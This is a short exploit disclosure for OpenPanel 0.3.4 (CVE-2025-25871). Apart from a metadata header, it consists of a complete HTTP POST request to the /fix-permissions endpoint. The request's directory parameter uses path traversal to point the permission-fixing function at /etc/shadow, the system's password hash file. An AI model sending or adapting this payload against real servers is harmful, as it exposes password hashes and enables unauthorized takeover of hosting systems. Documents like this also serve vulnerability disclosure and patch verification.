# Exploit Title: OpenPanel 0.3.4 - Insecure Permission Modification via Fix Permission Function
# Date: Nov 7, 2024
# Exploit Author: Punthat Siriwan, Korn Chaisuwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2025-25871

POST /fix-permissions HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFuA.wDaUg0WYvBXvCQkEpxPwgcMeSpc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/fix-permissions
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

directory=%2Fhome%2Fstefan%2Fetc%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow